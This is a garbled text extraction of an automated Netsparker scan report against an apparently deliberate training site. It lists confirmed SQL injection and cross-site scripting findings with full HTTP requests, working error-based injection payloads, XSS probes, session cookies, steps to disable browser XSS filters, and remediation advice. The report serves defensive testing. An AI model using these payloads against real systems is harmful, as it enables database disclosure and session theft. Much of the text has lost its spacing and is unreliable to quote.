hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
23 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
12 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
24 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
13 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
14 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
